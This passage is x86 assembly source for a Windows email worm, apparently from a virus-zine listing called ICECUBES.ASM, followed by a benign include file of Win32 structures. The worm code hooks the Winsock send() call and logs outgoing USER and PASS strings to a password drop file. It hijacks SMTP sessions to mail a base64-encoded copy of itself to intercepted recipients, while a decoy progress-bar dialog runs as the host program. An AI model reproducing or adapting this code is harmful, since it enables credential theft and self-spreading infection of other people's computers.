mov [ebp + woldapiaddress], edi ; save it
ChangeWsock:
mov eax, dword ptr [ebp + wnewapiaddress] ; new api address
mov dword ptr [esi], eax ; set it
ret
HOOK_API endp
RVA_TO_RAW proc
GetRaw:
mov ebx, [ebp + mapaddress]
mov [ebp + rva2raw], edx
FindCorrespondingSection:
mov eax, dword ptr [ebp + rva2raw] ; rva we want into raw
mov edx, dword ptr [edi + 12d] ; section RVA
sub eax, edx
cmp eax, dword ptr [edi+08d] ; section size
jb SectionFound
NotThisSection:
add edi, 40d
loop FindCorrespondingSection
EndRawSearch:
ret
SectionFound:
mov ecx, dword ptr [edi+20d] ; pntr to section's raw
sub edx, ecx ; data from beginning
add ecx, eax ; of file
add ecx, ebx
ret
RVA_TO_RAW endp
CREATE_INI_FILE proc
IniGetSetWindowsDir:
call SET_WINDIR
CreateInstallIni:
push 0 ; template handle=0
push 20h ; attributes=any file
push 4 ; type= new file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea eax, [ebp + inifile]
push eax ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax
SetIniFilePointerToEnd:
push 02h
push 00h
push 00h
push [ebp + filehandle]
lea eax, [ebp + ASetFilePointer]
call GETAPI
mov dword ptr [ebp + writtensize], 00h
WriteInstallIniLoop:
lea esi, [ebp + inicrlf]
xor ecx, ecx
call StringSize
call Write
WriteWsock32Dll:
lea esi, [ebp + wsock32dll] ; write original dll
xor ecx, ecx
call StringSize
call Write
WriteOn:
lea esi, [ebp + equalsign] ; write original dll
xor ecx, ecx
call StringSize
call Write
WriteInfectedWsock:
lea esi, [ebp + wsock32inf] ; write original dll
xor ecx, ecx
call StringSize
call Write
jmp CloseInstallIni
StringSize:
cmp byte ptr [esi + ecx], 0h
je GotSize
inc ecx
jmp StringSize
GotSize:
mov word ptr [ebp + writtensize], cx
ret
Write:
push 0h
lea eax, [ebp + writtenbytes]
push eax
xor eax, eax
mov ax, word ptr [ebp + writtensize]
push eax
push esi
push dword ptr [ebp + filehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
ret
CloseInstallIni:
lea esi, [ebp + inicrlf] ; write original dll
xor ecx, ecx
call StringSize
call Write
CREATE_INI_FILE endp
COPY_HOST_FILE proc
GetCurrentHostPath:
push 100h
lea eax, [ebp + currentdir]
push eax
push 00h
lea eax, [ebp + AGetModuleFileName]
call GETAPI
SetSysDirectory:
call SET_SYSDIR
CopyWormHostFile:
push 00h
lea eax, [ebp + wsock2]
push eax
lea eax, [ebp + currentdir]
push eax
lea eax, [ebp + ACopyFile]
call GETAPI
ret
COPY_HOST_FILE endp
INTERCEPT_WSOCK proc
InterceptWsockApiCall:
push ebp
call GetDelta
GetDelta:
pop ebp
sub ebp, offset GetDelta
pushad
CheckStatus:
mov eax, [esp+(8*4)+(1*4)+4 + 0] ; get send() socket
mov [ebp + socketh], eax ; save it
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
pushad
call GET_GETPROCADDRESS_API_ADDRESS
popad
CheckForSecurityInfo:
cmp [esi], 'RESU'
je StoreBufferData
cmp [esi], 'SSAP'
jne DontStore
StoreBufferData:
pushad
call WRITE_TO_FILE
popad
DontStore:
cmp [ebp + status], 00h ; monitoring==true ?
je CheckMailFrom ; yes, we are
cmp [ebp + status], 02h
je CheckRcptTo
cmp [ebp + status], 03h
je CheckMimeFrom
cmp [ebp + status], 05h
je CheckQuit
jmp Continue
CheckMailFrom:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'LIAM'
jne Continue
StoreMailFromTag:
pushad
call WRITE_TO_FILE
popad
SaveMailFrom:
mov [ebp + fromsize], ecx
push ecx
push esi
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending
pop esi
pop ecx
mov [ebp + fromaddress], eax
mov edi, eax
rep movsb
mov [ebp + status], 02h
CheckRcptTo:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'TPCR'
jne CheckData
AllocateRcptMemory:
cmp [ebp + rcptnumber], 00h
jne SaveRcptTo
push ecx
push esi
push 500h
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending ; mem for rctp email
mov [ebp + rcpt_buffer_address], eax ; addresses
push 100h
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending ; mem for size of rctp
mov [ebp + rcpt_size_address], eax ; email addresses
pop esi
pop ecx
SaveRcptTo:
push ecx ; store rcpt string
mov edi, [ebp + rcpt_buffer_address]
mov eax, [ebp + totalrcptsize]
add edi, eax
rep movsb
pop ecx
CheckData:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'ATAD'
jne Continue
mov [ebp + status], 03h
CheckMimeFrom:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
MimeFromLoop:
lea edi, [ebp + fromtag]
push ecx
push esi
mov ecx, 05h
rep cmpsb
pop esi
pop ecx
je SearchMimeFromEnd
inc esi
loop MimeFromLoop
CheckMimeTo:
mov esi, [esp+(8*4)+(1*4)+4 + 4]
mov ecx, [esp+(8*4)+(1*4)+4 + 8]
MimeToLoop:
lea edi, [ebp + totag]
push ecx
push esi
mov ecx, 03h
rep cmpsb
pop esi
pop ecx
je SearchMimeToEnd
inc esi
loop MimeToLoop
jmp CheckQuit
SearchMimeFromEnd:
push esi
FromEndLoop:
lea edi, [ebp + mimeendtag]
push ecx
push esi
mov ecx, 01h
rep cmpsb
pop esi
pop ecx
je SaveMimeFrom
inc esi
loop FromEndLoop
pop esi
jmp Continue
SaveMimeFrom:
mov eax, esi
pop esi
sub eax, esi
mov ecx, eax
add ecx, 03h
mov [ebp + mimefromsize], ecx
push esi
push ecx
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz MimeError
mov [ebp + mimefrom_address], eax
pop ecx
pop esi
mov edi, eax
rep movsb
SearchMimeToEnd:
push esi
ToEndLoop:
lea edi, [ebp + toendtag]
push ecx
push esi
mov ecx, 08h
rep cmpsb
pop esi
pop ecx
je SaveMimeTo
inc esi
loop ToEndLoop
pop esi
jmp Continue
SaveMimeTo:
mov eax, esi
pop esi
sub eax, esi
mov ecx, eax
mov [ebp + mimetosize], ecx
push esi
push ecx
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz MimeError
mov [ebp + mimeto_address], eax
pop ecx
pop esi
mov edi, eax
rep movsb
MimeError:
pop ecx
pop esi
mov [ebp + status], 05h
CheckQuit:
mov esi, [esp+(8*4)+(1*4)+4 + 4]
mov ecx, [esp+(8*4)+(1*4)+4 + 8]
cmp [esi], 'TIUQ'
jne Continue
pushad
call SEND_MAIL
popad
jmp InterceptionFinished
ErrorWhileSending:
pop esi
pop ecx
InterceptionFinished:
mov [ebp + status], 00h
mov [ebp + totalrcptsize], 00h
mov [ebp + rcptnumber], 00h
mov [ebp + tostatus], 00h
mov [ebp + fromstatus], 00h
jmp Continue
Continue:
popad
lea eax, [ebp + InterceptWsockApiCall] ; get ep va
sub eax, dword ptr [ebp + wnewapiaddress] ; - ep RVA
add eax, dword ptr [ebp + woldapiaddress] ; = imagebase
pop ebp
jmp eax
INTERCEPT_WSOCK endp
PREPARE_ATTACHMENT proc
SetSysDir:
call SET_SYSDIR
OpenSourceFile:
push 0
push 0
push 3
push 0
push 0
push 80000000h
lea eax, [ebp + wsock2]
push eax
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax ; save file handle
cmp eax, -1
je NoBase64Encode
GetSourceFileSize:
push 00h
push dword ptr [ebp + filehandle]
lea eax, [ebp + AGetFileSize]
call GETAPI
or eax, eax
jz NoBase64Encode
mov [ebp + filesize], eax ; get file size
AllocateSourceMemory:
add eax, 02h
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz NoBase64Encode ; not enough memory?
mov [ebp + smHnd], eax ; sourcememory handle
AllocateDestinationMemory:
mov eax, [ebp + filesize]
xor edx, edx
mov ecx, 02h
mul ecx
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz NoBase64Encode ; not enough memory?
mov [ebp + dmHnd], eax ; destinationmemory handle
ReadSourceFile:
mov [ebp + bytesread], 00h
push 00h
lea eax, [ebp + bytesread]
push eax
push [ebp + filesize]
push dword ptr [ebp + smHnd]
push dword ptr [ebp + filehandle]
lea eax, [ebp + AReadFile]
call GETAPI
CloseSourceFile:
push dword ptr [ebp + filehandle] ; close the file
lea eax, [ebp + ACloseHandle]
call GETAPI
EncodeSourceData:
mov eax, dword ptr [ebp + smHnd]
mov edx, dword ptr [ebp + dmHnd]
mov ecx, dword ptr [ebp + filesize]
call BASE64_ENCODER ; encode into Base64
mov [ebp + encodedsize], ecx
NoBase64Encode:
ret
PREPARE_ATTACHMENT endp
BASE64_ENCODER proc
AddTwoBytes:
cmp edx, 01h
jne AddOneByte
add ecx, 02h
jmp EncodeBase64
AddOneByte:
add ecx, 01h
EncodeBase64:
pop edx
pop eax
xor esi, esi
lea edi, [ebp + encTable]
push ebp
xor ebp, ebp
BaseLoop:
xor ebx, ebx
mov bl, byte ptr [eax]
shr bl, 2
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
mov bx,word ptr [eax]
xchg bl, bh
shr bx, 6
xor bh, bh
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
xor ebx, ebx
mov bl, byte ptr [eax]
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
inc ebp
cmp ebp, 24
ja AddEndOfLine
inc ebp
AddedEndOfLine:
sub ecx, 3
or ecx, ecx
jnz BaseLoop
AddEndOfLine:
xor ebp, ebp
mov word ptr [edx+esi], 0a0dh
add esi, 2
jmp AddedEndOfLine
BASE64_ENCODER endp
WRITE_TO_FILE proc
StoreBuffer:
push esi
push ecx
SetEmailDropDir:
call SET_WINDIR
CreateEmailDrop:
push 0 ; template handle=0
push 20h ; attributes=any file
push 04h ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea eax, [ebp + passwordfile]
push eax ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax ; save file handle
cmp eax, -1
je BufferError
SetDropPointer:
push 2
push 0
push 0
push dword ptr [ebp + filehandle] ; filehandle
lea eax, [ebp + ASetFilePointer]
call GETAPI
pop ecx
pop esi
WriteBuffer:
push 0h
lea eax, [ebp + writtenbytes]
push eax
push ecx ; push buffersize
push esi ; push offset buffer
push dword ptr [ebp + filehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
CloseBufferFile:
push dword ptr [ebp + filehandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
ret
BufferError:
pop ecx
pop esi
ret
WRITE_TO_FILE endp
SEND_MAIL proc
GetAllApiAddresses:
call GET_WSOCK32_BASE_ADDRESS
call GET_USER32_BASE_ADDRESS
call PREPARE_ATTACHMENT
AllocateEmailBufferMemory:
mov eax, [ebp + encodedsize]
mov ecx, 02h
mul ecx
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz SendError ; mem for email
mov [ebp + email_buffer_address], eax ; buffer
SendMailFromTag:
mov eax, dword ptr [ebp + fromaddress]
mov ecx, dword ptr [ebp + fromsize]
call SendCommand
call ReceiveReply
SendRcptToTags:
xor ecx, ecx
mov [ebp + totalrcptsize], 00h
RcptSendLoop:
push ecx
mov edi, [ebp + rcpt_size_address]
mov eax, ecx
mov edx, 04h
mul edx
add edi, eax
mov ecx, dword ptr [edi]
pushad
mov eax, esi
call SendCommand
call ReceiveReply
popad
pop ecx
inc ecx
mov eax, [ebp + rcptnumber]
cmp ecx, eax
jne RcptSendLoop
SendDataCommand:
lea eax, [ebp + datatag]
mov ecx, 06h
call SendCommand
call ReceiveReply
EmailBody_EmailId:
mov [ebp + email_size], 00h
mov edi, [ebp + email_buffer_address]
lea esi, [ebp + emailid]
mov ecx, 21d
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailFrom:
cmp [ebp + fromstatus], 01h
jne EmailBody_MakeEmailFrom
EmailBody_MakeEmailFrom:
lea esi, [ebp + fromtag]
mov ecx, 05h
add [ebp + email_size], ecx
rep movsb
EmailBody_MakeEmailTo:
lea esi, [ebp + totag]
mov ecx, 03h
add [ebp + email_size], ecx
rep movsb
RcptStringLoop:
push ecx
push edi
mov edi, [ebp + rcpt_size_address]
mov eax, ecx
mov edx, 04h
mul edx
add edi, eax
mov ecx, dword ptr [edi]
pop edi
push ecx
mov esi, [ebp + rcpt_buffer_address]
mov eax, [ebp + totalrcptsize]
add esi, eax
add esi, 08h
sub ecx, 08h
add [ebp + email_size], ecx
rep movsb
pop ecx
add eax, ecx
mov [ebp + totalrcptsize], eax
pop ecx
inc ecx
mov eax, [ebp + rcptnumber]
cmp ecx, eax
jne RcptStringLoop
EmailBody_EmailStartPart:
lea esi, [ebp + emailstart]
mov ecx, emailend-emailstart
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailAttachement:
mov esi, dword ptr [ebp + dmHnd]
mov ecx, [ebp + encodedsize]
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailEndPart:
lea esi, [ebp + emailtail]
mov ecx, 17d
add [ebp + email_size], ecx
rep movsb
EmailBody_EndTag:
lea esi, [ebp + endtag]
mov ecx, 05h
add [ebp + email_size], ecx
rep movsb
SendEmailBody:
mov eax, [ebp + email_buffer_address]
mov ecx, [ebp + email_size]
call SendCommand
call ReceiveReply
MessageBoxDay:
lea eax, [ebp + timedate]
push eax
lea eax, [ebp + AGetSystemTime]
call GETAPI
MessageBoxPayload:
mov eax, 0040h
push eax
lea eax, [ebp + windowtitle]
push eax
lea eax, [ebp + msgmessage]
push eax
push 00h
lea eax, [ebp + AMessageBox]
call GETUAPI
SendError:
ret
SendCommand:
push eax
push 0h
push ecx
push eax
push dword ptr [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
cmp eax, -1
jne SendWentOk
pop eax
jmp SendCommand
SendWentOk:
pop eax
ret
ReceiveReply:
push LARGE 0
push LARGE 60
lea eax, [ebp + recvbuffer]
push eax
push dword ptr [ebp + socketh]
lea eax, [ebp + ARecv]
call GETWAPI ; call the api
cmp eax, -1
je ReceiveReply
ret
SEND_MAIL endp
;****************************************************************************;
Leap:
.code
OriginalHost:
push 0
call GetModuleHandleA
mov hInst, eax
CreateProgressWindow:
push 00h
push offset MYDIALOG_0
push 00h
push 102
push hInst
call DialogBoxParamA
CreateMainWindow:
push 00h
push offset MYDIALOG_1
push 00h
push 103
push hInst
call DialogBoxParamA
Leave:
push 0
call ExitProcess
CheckParameter:
cmp [umsg], WM_INITDIALOG
je CenterDlg
cmp [umsg], WM_DESTROY
je Exit
cmp [umsg], WM_CLOSE
je Exit
cmp flag, 01h
je CreateProgressThread
cmp flag, 02h
je Exit
xor eax, eax
ret
CenterDlg:
push offset dlgrect
push handle
call GetWindowRect
call GetDesktopWindow
push offset desktoprect
push eax
call GetWindowRect
push 00h
mov eax, dlgrect.rcBottom
sub eax, dlgrect.rcTop
mov dlgheight, eax
push eax ; height
mov eax, dlgrect.rcRight
sub eax, dlgrect.rcLeft
mov dlgwidth, eax ; width
push eax
mov eax, desktoprect.rcBottom
sub eax, dlgheight
shr eax, 1
push eax ; bottom
mov eax, desktoprect.rcRight
sub eax, dlgwidth
shr eax, 1
push eax ; top
push handle ; handle
call MoveWindow ; move to center
mov flag, 01h
xor eax, eax
ret
CreateProgressThread:
push offset threadid
push 00h
push handle
push offset PROGRESS
push 00h
push 00h
call CreateThread
mov flag, 00h
xor eax, eax
ret
Exit:
push wparam
push handle
call EndDialog
mov eax, 01h
ret
MYDIALOG_0 endp
CheckParameter1:
cmp [umsg], WM_INITDIALOG
je CenterDlg1
cmp [umsg], WM_DESTROY
je Exit1
cmp [umsg], WM_CLOSE
je Exit1
cmp [umsg], WM_COMMAND
je CheckCommand
cmp [umsg], WM_VSCROLL
je SpinButtonClick
cmp initflag, 01h
je InitValues
xor eax, eax
ret
CheckCommand:
cmp [wparam], 1009
je Exit
cmp [wparam], 1014
je SetOkFlag
xor eax, eax
ret
SpinButtonClick:
xor eax, eax
mov ecx, [wparam]
rol ecx, 16
mov ax, cx
PressedDown:
mov pastvalue, eax
cmp doneflag, 00h
jne Reset
cmp currentvalue, '0'
je DontDecrease
dec byte ptr currentvalue
DontDecrease:
push offset currentvalue
push 00h
push WM_SETTEXT
push 1003
push handle
call SendDlgItemMessageA
mov doneflag, 01h
xor eax, eax
ret
PressedUp:
mov pastvalue, eax
cmp currentvalue, '9'
je Reset
cmp doneflag, 00h
jne Reset
inc byte ptr currentvalue
push offset currentvalue
push 00h
push WM_SETTEXT
push 1003
push handle
call SendDlgItemMessageA
mov doneflag, 01h
xor eax, eax
ret
Reset:
mov doneflag, 00h
xor eax, eax
ret
SetOkFlag:
mov okflag, 01h
jmp Exit
CenterDlg1:
push offset dlgrect
push handle
call GetWindowRect
call GetDesktopWindow
push offset desktoprect
push eax
call GetWindowRect
push 00h
mov eax, dlgrect.rcBottom
sub eax, dlgrect.rcTop
mov dlgheight, eax
push eax ; height
mov eax, dlgrect.rcRight
sub eax, dlgrect.rcLeft
mov dlgwidth, eax ; width
push eax
mov eax, desktoprect.rcBottom
sub eax, dlgheight
shr eax, 1
push eax ; bottom
mov eax, desktoprect.rcRight
sub eax, dlgwidth
shr eax, 1
push eax ; top
push handle ; handle
call MoveWindow ; move to center
mov initflag, 01h
xor eax, eax
ret
InitValues:
mov initflag, 00h
call SendDlgItemMessageA, handle, 1004, CB_RESETCONTENT, 00h,00h
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value11
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value12
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value13
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value14
call SendDlgItemMessageA, handle, 1004, CB_SETCURSEL, 00h, 01h
call SendDlgItemMessageA, handle, 1003, WM_SETTEXT, 00h, offset currentvalue
call SendDlgItemMessageA, handle, 1005, WM_SETTEXT, 00h, offset value3
call SendDlgItemMessageA, handle, 1008, WM_SETTEXT, 00h, offset value4
call SendDlgItemMessageA, handle, 1000, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1001, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1006, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1010, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1013, 00F5h, 00h,00h
xor eax, eax
ret
Exit1:
push wparam
push handle
call EndDialog
mov eax, 01h
ret
MYDIALOG_1 endp
ClearProgressBar:
push 00h
push 00h
push PBM_SETPOS
push 105
push handle
call SendDlgItemMessageA
xor eax, eax
xor ecx, ecx
LittleLoop:
inc ecx
cmp ecx, 100000h ; busy-wait delay between progress-bar steps
jne LittleLoop
ProgressLoop:
inc eax
push 00h
push eax
push PBM_SETPOS
push 105
push handle
call SendDlgItemMessageA
xor ecx, ecx
cmp eax, 99d ; step the bar from 1 to 99
jne LittleLoop
ProgressDone:
mov flag, 02h
push threadid
call CloseHandle
ret
PROGRESS endp
;============================================================================;
end Start
end
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ICECUBES.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
LPVOID typedef DWORD ;long ptr to buffer
BOOL typedef DWORD ;boolean variable
HANDLE typedef DWORD ;unspecified handle
LPSTR typedef DWORD ;long ptr to string
LPBYTE typedef DWORD ;long ptr to byte
ACHAR typedef BYTE ;ansi character
CHAR textequ <ACHAR> ;ansi char type
CHAR_ equ 1 ;ansi char size
CREATE_DEFAULT_ERROR_MODE equ 04000000h
PROCESS_INFORMATION struct
pi_hProcess HANDLE 0 ;process handle
pi_hThread HANDLE 0 ;thread handle
pi_dwProcessId DWORD 0 ;process id
pi_dwThreadId DWORD 0 ;thread id
PROCESS_INFORMATION ends
PROCESS_INFORMATION_ equ 4+4+4+4
STARTUPINFO struct
si_cb DWORD 0 ;structure size
si_lpReserved LPSTR 0 ;(reserved)
si_lpDesktop LPSTR 0 ;desktop name
sl_lpTitle LPSTR 0 ;console window title
si_dwX DWORD 0 ;window origin (column)
si_dwY DWORD 0 ;window origin (row)
si_dwXSize DWORD 0 ;window width
si_dwYSize DWORD 0 ;window height
si_dwXCountChars DWORD 0 ;screen buffer width
si_dwYCountChars DWORD 0 ;screen buffer height
si_dwFillAttribute DWORD 0 ;console window initialization
si_dwFlags DWORD 0 ;structure member flags
si_wShowWindow WORD 0 ;ShowWindow() parameter
si_cbReserved2 WORD 0 ;(reserved)
si_lpReserved2 LPBYTE 0 ;(reserved)
si_hStdInput HANDLE 0 ;standard input handle
si_hStdOutput HANDLE 0 ;standard output handle
si_hStdError HANDLE 0 ;standard error handle
STARTUPINFO ends
STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4
SYSTEMTIME struct
wYear WORD 0 ;current year
wMonth WORD 0 ;current month (1..12)
wDayOfWeek WORD 0 ;day of week (0 = sunday)
wDay WORD 0 ;current day of the month
wHour WORD 0 ;current hour
wMinute WORD 0 ;current minute
wSecond WORD 0 ;current second
wMilliseconds WORD 0 ;current millisecond
SYSTEMTIME ends
SYSTEMTIME_ equ 2+2+2+2+2+2+2+2
;
;*******************************************************************
;
; Misc EQU's
;
;*******************************************************************
GCL_MENUNAME equ -8
GCL_HBRBACKGROUND equ -10
GCL_HCURSOR equ -12
GCL_HICON equ -14
GCL_HMODULE equ -16
GCL_CBWNDEXTRA equ -18
GCL_CBCLSEXTRA equ -20
GCL_WNDPROC equ -24
GCL_STYLE equ -26
ICON_SMALL equ 0
DEFAULT_PITCH equ 0
DEFAULT_QUALITY equ 0
OEM_CHARSET equ 255
CLIP_CHARACTER_PRECIS equ 1
CLIP_DEFAULT_PRECIS equ 0
OUT_DEFAULT_PRECIS equ 0
;*******************************************************************
;
; Window Class
;
;*******************************************************************
DLGWINDOWEXTRA equ 30
WNDCLASSEX STRUCT
wc_cbSize DWORD ?
wc_style DWORD ?
wc_lpfnWndProc DWORD ?
wc_cbClsExtra DWORD ?
wc_cbWndExtra DWORD ?
wc_hInstance DWORD ?
wc_hIcon DWORD ?
wc_hCursor DWORD ?
wc_hbrBackground DWORD ?
wc_lpszMenuName DWORD ?
wc_lpszClassName DWORD ?
wc_hIconSm DWORD ?
WNDCLASSEX ENDS
;*******************************************************************
;
; Message Structure
;
;*******************************************************************
MSG STRUCT
msg_hwnd DWORD ?
msg_message DWORD ?
msg_wParam DWORD ?
msg_lParam DWORD ?
msg_time DWORD ?
msg_pt QWORD ?
MSG ENDS
;*******************************************************************
;
; Open Filename Dialog
;
;*******************************************************************
OPENFILENAME STRUCT
of_lStructSize DWORD ?
of_hWndOwner DWORD ?
of_hInstance DWORD ?
of_lpstrFilter DWORD ?
of_lpstrCustomFilter DWORD ?
of_nMaxCustFilter DWORD ?
of_nFilterIndex DWORD ?
of_lpstrFile DWORD ?
of_nMaxFile DWORD ?
of_lpstrFileTitle DWORD ?
of_nMaxFileTitle DWORD ?
of_lpstrInitialDir DWORD ?
of_lpstrTitle DWORD ?
of_Flags DWORD ?
of_nFileOffset WORD ?
of_nFileExtension WORD ?
of_lpstrDefExt DWORD ?
of_lCustData DWORD ?
of_lpfnHook DWORD ?
of_lpTemplateName DWORD ?
OPENFILENAME ENDS
;*******************************************************************
;
; List View Control
;
;*******************************************************************
LV_ITEM STRUC
lvi_imask DWORD ?
lvi_iItem DWORD ?
lvi_iSubItem DWORD ?
lvi_state DWORD ?
lvi_stateMask DWORD ?
lvi_pszText DWORD ?
lvi_cchTextMax DWORD ?
lvi_iImage DWORD ?
lvi_lParam DWORD ?
lvi_iIndent DWORD ?
LV_ITEM ENDS
LV_FINDINFO STRUC
lvfi_flags DWORD ?
lvfi_psz DWORD ?
lvfi_lParam DWORD ?
lvfi_pt QWORD ?
lvfi_vkDirection DWORD ?
LV_FINDINFO ENDS
LV_HITTESTINFO STRUC
lvht_pt QWORD ?
lvht_flags DWORD ?
lvht_iItem DWORD ?
LV_HITTESTINFO ENDS
LV_COLUMN STRUC
lvc_imask DWORD ?
lvc_fmt DWORD ?
lvc_lx DWORD ?
lvc_pszText DWORD ?
lvc_cchTextMax DWORD ?
lvc_iSubItem DWORD ?
LV_COLUMN ENDS
;*******************************************************************
;
; Rectangle
;
;*******************************************************************
RECT struc
rcLeft dd ?
rcTop dd ?
rcRight dd ?
rcBottom dd ?
RECT ends
;*******************************************************************
;
; Window Class structure
;
;*******************************************************************
WNDCLASS struc
clsStyle dw ? ; class style
clsLpfnWndProc dd ?
clsCbClsExtra dw ?
clsCbWndExtra dw ?
clsHInstance dw ? ; instance handle
clsHIcon dw ? ; class icon handle
clsHCursor dw ? ; class cursor handle
clsHbrBackground dw ? ; class background brush
clsLpszMenuName dd ? ; menu name
clsLpszClassName dd ? ; far ptr to class name
WNDCLASS ends
IFNDEF NOTEXT
TEXTMETRIC struc
tmHeight dw ?
tmAscent dw ?
tmDescent dw ?
tmIntLeading dw ?
tmExtLeading dw ?
tmAveCharWidth dw ?
tmMaxCharWidth dw ?
tmWeight dw ?
tmItalic db ?
tmUnderlined db ?
tmStruckOut db ?
tmFirstChar db ?
tmLastChar db ?
tmDefaultChar db ?
tmBreakChar db ?
tmPitch db ?
tmCharSet db ?
tmOverhang dw ?
tmAspectX dw ?
tmAspectY dw ?
TEXTMETRIC ends
LF_FACESIZE EQU 32
LOGFONT struc
lfHeight dw ?
lfWidth dw ?
lfEscapement dw ?
lfOrientation dw ?
lfWeight dw ?
lfItalic db ?
lfUnderline db ?
lfStrikeOut db ?
lfCharSet db ?
lfOutPrecision db ?
lfClipPrecision db ?
lfQuality db ?
lfPitchAndFamily db ?
lfFaceName db LF_FACESIZE dup(?)
LOGFONT ends
LOGBRUSH struc
lbStyle dw ?
lbColor dd ?
lbHatch dw ?
LOGBRUSH ends
;
; Text Drawing modes
;
TRANSPARENT = 1
OPAQUE = 2
;
; Mapping Modes
;
MM_TEXT = 1
MM_LOMETRIC = 2
MM_HIMETRIC = 3
MM_LOENGLISH = 4
MM_HIENGLISH = 5
MM_TWIPS = 6
MM_ISOTROPIC = 7
MM_ANISOTROPIC = 8
;
; Coordinate Modes
;
ABSOLUTE = 1
RELATIVE = 2
;
; Stock Logical Objects
;
WHITE_BRUSH = 0
LTGRAY_BRUSH = 1
GRAY_BRUSH = 2
DKGRAY_BRUSH = 3
BLACK_BRUSH = 4
NULL_BRUSH = 5
HOLLOW_BRUSH = 5
WHITE_PEN = 6
BLACK_PEN = 7
NULL_PEN = 8
DOT_MARKER = 9
OEM_FIXED_FONT = 10
ANSI_FIXED_FONT = 11
ANSI_VAR_FONT = 12
SYSTEM_FONT = 13
DEVICE_DEFAULT_FONT = 14
DEFAULT_PALETTE = 15
SYSTEM_FIXED_FONT = 16
ENDIF
;
; Brush Styles
;
BS_SOLID = 0
BS_NULL = 1
BS_HOLLOW = BS_NULL
BS_HATCHED = 2
BS_PATTERN = 3
BS_INDEXED = 4
BS_DIBPATTERN = 5
;
; Hatch Styles
;
HS_HORIZONTAL = 0 ; -----
HS_VERTICAL = 1 ; |||||
HS_FDIAGONAL = 2 ; \\\\\
HS_BDIAGONAL = 3 ; /////
HS_CROSS = 4 ; +++++
HS_DIAGCROSS = 5 ; xxxxx
;
; Pen Styles
;
PS_SOLID = 0
PS_DASH = 1 ; -------
PS_DOT = 2 ; .......
PS_DASHDOT = 3 ; _._._._
PS_DASHDOTDOT = 4 ; _.._.._
PS_NULL = 5
PS_INSIDEFRAME = 6
;
; Device Parameters for GetDeviceCaps()
;
IFNDEF NOGDICAPMASKS
DRIVERVERSION =0 ; Device driver version
TECHNOLOGY =2 ; Device classification
HORZSIZE =4 ; Horizontal size in millimeters
VERTSIZE =6 ; Vertical size in millimeters
HORZRES =8 ; Horizontal width in pixels
VERTRES =10 ; Vertical height in pixels
BITSPIXEL =12 ; Number of bits per pixel
PLANES =14 ; Number of planes
NUMBRUSHES =16 ; Number of brushes the device has
NUMPENS =18 ; Number of pens the device has
NUMMARKERS =20 ; Number of markers the device has
NUMFONTS =22 ; Number of fonts the device has
NUMCOLORS =24 ; Number of colors the device supports
PDEVICESIZE =26 ; Size required for device descriptor
CURVECAPS =28 ; Curve capabilities
LINECAPS =30 ; Line capabilities
POLYGONALCAPS =32 ; Polygonal capabilities
TEXTCAPS =34 ; Text capabilities
CLIPCAPS =36 ; Clipping capabilities
RASTERCAPS =38 ; Bitblt capabilities
